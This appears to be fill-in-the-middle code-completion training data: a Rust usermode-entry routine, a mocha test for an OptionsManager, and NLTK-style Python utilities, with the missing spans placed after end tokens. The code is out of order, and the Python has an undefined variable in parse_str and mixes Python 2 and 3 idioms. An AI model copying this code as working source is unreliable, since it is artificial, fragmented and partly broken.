#[no_mangle]<|fim▁hole|>pub extern "C" fn _Unwind_Resume() -> ! {
loop {}
}
/// Enter in usermode.
///
/// This functions never returns.
pub unsafe fn usermode(ip: usize, sp: usize) -> ! {
asm!("
mov ds, ax
mov es, ax
mov fs, bx
mov gs, ax
push rax
push rcx
push rdx
push rsi
push rdi
iretq"
:
: "{rax}"(5 << 3 | 3) // Data segment
"{rbx}"(6 << 3 | 3) // TLS segment
"{rcx}"(sp) // Stack pointer
"{rdx}"(3 << 12 | 1 << 9) // Flags - Set IOPL and interrupt enable flag
"{rsi}"(4 << 3 | 3) // Code segment
"{rdi}"(ip) // Instruction Pointer
:
: "intel", "volatile"
);
unreachable!();
}<|fim▁end|>
| |
<|file_name|>OptionsManager.js<|end_file_name|><|fim▁begin|>/* eslint-env mocha */
import expect from 'expect';
import FunctionChecker from '../src/FunctionChecker.js';
import OptionsManager from '../src/OptionsManager.js';
import Structure from '../src/Structure.js';
describe('optionsManager', () => {
let manager;
beforeEach(() => {
manager = new OptionsManager();
});
context('#constructor', () => {
it('exposes .typeManager', () => {
expect(manager.typeManager).toNotBe(undefined);
});<|fim▁hole|> it('returns a Structure object', () => {
expect(manager.structure('arg1', {type: 'string'})).toBeA(Structure);
});
});
context('#check', () => {
it('returns a FunctionChecker object', () => {
expect(manager.check('customFunc')).toBeA(FunctionChecker);
});
});
});<|fim▁end|>
|
});
context('#structure', () => {
|
<|file_name|>internals.py<|end_file_name|><|fim▁begin|>"""
This file is part of L3Morpho.
Author: Michael Gasser <[email protected]>
-----------------------------------------------------------------
internals.py is part of
Natural Language Toolkit: Internal utility functions
Copyright (C) 2001-2008 University of Pennsylvania
Author: Steven Bird <[email protected]>
Edward Loper <[email protected]>
URL: <http://www.nltk.org/>
License: <http://creativecommons.org/licenses/by-nc-nd/3.0/us/>
"""
import subprocess, os.path, re, warnings, textwrap
import types
######################################################################
# Regular Expression Processing
######################################################################
def convert_regexp_to_nongrouping(pattern):
"""
Convert all grouping parenthases in the given regexp pattern to
non-grouping parenthases, and return the result. E.g.:
>>> convert_regexp_to_nongrouping('ab(c(x+)(z*))?d')
'ab(?:c(?:x+)(?:z*))?d'
@type pattern: C{str}
@rtype: C{str}
"""
# Sanity check: back-references are not allowed!
for s in re.findall(r'\\.|\(\?P=', pattern):
if s[1] in '0123456789' or s == '(?P=':
raise ValueError('Regular expressions with back-references '
'are not supported: %r' % pattern)
# This regexp substitution function replaces the string '('
# with the string '(?:', but otherwise makes no changes.
def subfunc(m):
return re.sub('^\((\?P<[^>]*>)?$', '(?:', m.group())
# Scan through the regular expression. If we see any backslashed
# characters, ignore them. If we see a named group, then
# replace it with "(?:". If we see any open parens that are part
# of an extension group, ignore those too. But if we see
# any other open paren, replace it with "(?:")
return re.sub(r'''(?x)
\\. | # Backslashed character
\(\?P<[^>]*> | # Named group
\(\? | # Extension group
\( # Grouping parenthasis''', subfunc, pattern)
##########################################################################
# Java Via Command-Line
##########################################################################
_java_bin = None
_java_options = []
def config_java(bin=None, options=None):
"""
Configure nltk's java interface, by letting nltk know where it can
find the C{java} binary, and what extra options (if any) should be
passed to java when it is run.
@param bin: The full path to the C{java} binary. If not specified,
then nltk will search the system for a C{java} binary; and if
one is not found, it will raise a C{LookupError} exception.
@type bin: C{string}
@param options: A list of options that should be passed to the
C{java} binary when it is called. A common value is
C{['-Xmx512m']}, which tells the C{java} binary to increase
the maximum heap size to 512 megabytes. If no options are
specified, then do not modify the options list.
@type options: C{list} of C{string}
"""
global _java_bin, _java_options
if bin is not None:
if not os.path.exists(bin):
raise ValueError('Could not find java binary at %r' % bin)
_java_bin = bin
if options is not None:
if isinstance(options, basestring):
options = options.split()
_java_options = list(options)
# Check the JAVAHOME environment variable.
for env_var in ['JAVAHOME', 'JAVA_HOME']:
if _java_bin is None and env_var in os.environ:
paths = [os.path.join(os.environ[env_var], 'java'),
os.path.join(os.environ[env_var], 'bin', 'java')]
for path in paths:
if os.path.exists(path):
_java_bin = path
print('[Found java: %s]' % path)
# If we're on a POSIX system, try using the 'which' command to
# find a java binary.
if _java_bin is None and os.name == 'posix':
try:
p = subprocess.Popen(['which', 'java'], stdout=subprocess.PIPE)
stdout, stderr = p.communicate()
path = stdout.strip()
if path.endswith('java') and os.path.exists(path):
_java_bin = path
print('[Found java: %s]' % path)
except:
pass
if _java_bin is None:
raise LookupError('Unable to find java! Use config_java() '
'or set the JAVAHOME environment variable.')
def java(cmd, classpath=None, stdin=None, stdout=None, stderr=None):
"""
Execute the given java command, by opening a subprocess that calls
C{java}. If java has not yet been configured, it will be configured
by calling L{config_java()} with no arguments.
@param cmd: The java command that should be called, formatted as
a list of strings. Typically, the first string will be the name
of the java class; and the remaining strings will be arguments
for that java class.
@type cmd: C{list} of C{string}
@param classpath: A C{':'} separated list of directories, JAR
archives, and ZIP archives to search for class files.
@type classpath: C{string}
@param stdin, stdout, stderr: Specify the executed programs'
standard input, standard output and standard error file
handles, respectively. Valid values are C{subprocess.PIPE},
an existing file descriptor (a positive integer), an existing
file object, and C{None}. C{subprocess.PIPE} indicates that a
new pipe to the child should be created. With C{None}, no
redirection will occur; the child's file handles will be
inherited from the parent. Additionally, stderr can be
C{subprocess.STDOUT}, which indicates that the stderr data
from the applications should be captured into the same file
handle as for stdout.
@return: A tuple C{(stdout, stderr)}, containing the stdout and
stderr outputs generated by the java command if the C{stdout}
and C{stderr} parameters were set to C{subprocess.PIPE}; or
C{None} otherwise.
@raise OSError: If the java command returns a nonzero return code.
"""
if isinstance(cmd, basestring):
raise TypeError('cmd should be a list of strings')
# Make sure we know where a java binary is.
if _java_bin is None:
config_java()
# Construct the full command string.
cmd = list(cmd)
if classpath is not None:
cmd = ['-cp', classpath] + cmd
cmd = [_java_bin] + _java_options + cmd
# Call java via a subprocess
p = subprocess.Popen(cmd, stdin=stdin, stdout=stdout, stderr=stderr)<|fim▁hole|> print(stderr)
raise OSError('Java command failed!')
return (stdout, stderr)
if 0:
#config_java(options='-Xmx512m')
# Write:
#java('weka.classifiers.bayes.NaiveBayes',
# ['-d', '/tmp/names.model', '-t', '/tmp/train.arff'],
# classpath='/Users/edloper/Desktop/weka/weka.jar')
# Read:
(a,b) = java(['weka.classifiers.bayes.NaiveBayes',
'-l', '/tmp/names.model', '-T', '/tmp/test.arff',
'-p', '0'],#, '-distribution'],
classpath='/Users/edloper/Desktop/weka/weka.jar')
######################################################################
# Parsing
######################################################################
class ParseError(ValueError):
"""
Exception raised by parse_* functions when they fail.
@param position: The index in the input string where an error occured.
@param expected: What was expected when an error occured.
"""
def __init__(self, expected, position):
ValueError.__init__(self, expected, position)
self.expected = expected
self.position = position
def __str__(self):
return 'Expected %s at %s' % (self.expected, self.position)
_STRING_START_RE = re.compile(r"[uU]?[rR]?(\"\"\"|\'\'\'|\"|\')")
def parse_str(s, start_position):
"""
If a Python string literal begins at the specified position in the
given string, then return a tuple C{(val, end_position)}
containing the value of the string literal and the position where
it ends. Otherwise, raise a L{ParseError}.
"""
# Read the open quote, and any modifiers.
m = _STRING_START_RE.match(s, start_position)
if not m: raise ParseError('open quote', start_position)
quotemark = m.group(1)
# Find the close quote.
_STRING_END_RE = re.compile(r'\\|%s' % quotemark)
position = m.end()
while True:
match = _STRING_END_RE.search(s, position)
if not match: raise ParseError('close quote', position)
if match.group(0) == '\\': position = match.end()+1
else: break
# Parse it, using eval. Strings with invalid escape sequences
# might raise ValueEerror.
try:
return eval(s[start_position:match.end()]), match.end()
except ValueError as e:
raise ParseError('valid string (%s)' % e, start)
_PARSE_INT_RE = re.compile(r'-?\d+')
def parse_int(s, start_position):
"""
If an integer begins at the specified position in the given
string, then return a tuple C{(val, end_position)} containing the
value of the integer and the position where it ends. Otherwise,
raise a L{ParseError}.
"""
m = _PARSE_INT_RE.match(s, start_position)
if not m: raise ParseError('integer', start_position)
return int(m.group()), m.end()
_PARSE_NUMBER_VALUE = re.compile(r'-?(\d*)([.]?\d*)?')
def parse_number(s, start_position):
"""
If an integer or float begins at the specified position in the
given string, then return a tuple C{(val, end_position)}
containing the value of the number and the position where it ends.
Otherwise, raise a L{ParseError}.
"""
m = _PARSE_NUMBER_VALUE.match(s, start_position)
if not m or not (m.group(1) or m.group(2)):
raise ParseError('number', start_position)
if m.group(2): return float(m.group()), m.end()
else: return int(m.group()), m.end()
######################################################################
# Check if a method has been overridden
######################################################################
def overridden(method):
"""
@return: True if C{method} overrides some method with the same
name in a base class. This is typically used when defining
abstract base classes or interfaces, to allow subclasses to define
either of two related methods:
>>> class EaterI:
... '''Subclass must define eat() or batch_eat().'''
... def eat(self, food):
... if overridden(self.batch_eat):
... return self.batch_eat([food])[0]
... else:
... raise NotImplementedError()
... def batch_eat(self, foods):
... return [self.eat(food) for food in foods]
@type method: instance method
"""
# [xx] breaks on classic classes!
if isinstance(method, types.MethodType) and method.im_class is not None:
name = method.__name__
funcs = [cls.__dict__[name]
for cls in _mro(method.im_class)
if name in cls.__dict__]
return len(funcs) > 1
else:
raise TypeError('Expected an instance method.')
def _mro(cls):
"""
Return the I{method resolution order} for C{cls} -- i.e., a list
containing C{cls} and all its base classes, in the order in which
they would be checked by C{getattr}. For new-style classes, this
is just cls.__mro__. For classic classes, this can be obtained by
a depth-first left-to-right traversal of C{__bases__}.
"""
if isinstance(cls, type):
return cls.__mro__
else:
mro = [cls]
for base in cls.__bases__: mro.extend(_mro(base))
return mro
######################################################################
# Deprecation decorator & base class
######################################################################
# [xx] dedent msg first if it comes from a docstring.
def _add_deprecated_field(obj, message):
"""Add a @deprecated field to a given object's docstring."""
indent = ''
# If we already have a docstring, then add a blank line to separate
# it from the new field, and check its indentation.
if obj.__doc__:
obj.__doc__ = obj.__doc__.rstrip()+'\n\n'
indents = re.findall(r'(?<=\n)[ ]+(?!\s)', obj.__doc__.expandtabs())
if indents: indent = min(indents)
# If we don't have a docstring, add an empty one.
else:
obj.__doc__ = ''
obj.__doc__ += textwrap.fill('@deprecated: %s' % message,
initial_indent=indent,
subsequent_indent=indent+' ')
def deprecated(message):
"""
A decorator used to mark functions as deprecated. This will cause
a warning to be printed the when the function is used. Usage:
>>> @deprecated('Use foo() instead')
>>> def bar(x):
... print x/10
"""
def decorator(func):
msg = ("Function %s() has been deprecated. %s"
% (func.__name__, message))
msg = '\n' + textwrap.fill(msg, initial_indent=' ',
subsequent_indent=' ')
def newFunc(*args, **kwargs):
warnings.warn(msg, category=DeprecationWarning, stacklevel=2)
return func(*args, **kwargs)
# Copy the old function's name, docstring, & dict
newFunc.__dict__.update(func.__dict__)
newFunc.__name__ = func.__name__
newFunc.__doc__ = func.__doc__
newFunc.__deprecated__ = True
# Add a @deprecated field to the docstring.
_add_deprecated_field(newFunc, message)
return newFunc
return decorator
class Deprecated(object):
"""
A base class used to mark deprecated classes. A typical usage is to
alert users that the name of a class has changed:
>>> class OldClassName(Deprecated, NewClassName):
... "Use NewClassName instead."
The docstring of the deprecated class will be used in the
deprecation warning message.
"""
def __new__(cls, *args, **kwargs):
# Figure out which class is the deprecated one.
dep_cls = None
for base in _mro(cls):
if Deprecated in base.__bases__:
dep_cls = base; break
assert dep_cls, 'Unable to determine which base is deprecated.'
# Construct an appropriate warning.
doc = dep_cls.__doc__ or ''.strip()
# If there's a @deprecated field, strip off the field marker.
doc = re.sub(r'\A\s*@deprecated:', r'', doc)
# Strip off any indentation.
doc = re.sub(r'(?m)^\s*', '', doc)
# Construct a 'name' string.
name = 'Class %s' % dep_cls.__name__
if cls != dep_cls:
name += ' (base class for %s)' % cls.__name__
# Put it all together.
msg = '%s has been deprecated. %s' % (name, doc)
# Wrap it.
msg = '\n' + textwrap.fill(msg, initial_indent=' ',
subsequent_indent=' ')
warnings.warn(msg, category=DeprecationWarning, stacklevel=2)
# Do the actual work of __new__.
return object.__new__(cls, *args, **kwargs)
##########################################################################
# COUNTER, FOR UNIQUE NAMING
##########################################################################
class Counter:
"""
A counter that auto-increments each time its value is read.
"""
def __init__(self, initial_value=0):
self._value = initial_value
def get(self):
self._value += 1
return self._value<|fim▁end|>
|
(stdout, stderr) = p.communicate()
# Check the return code.
if p.returncode != 0:
|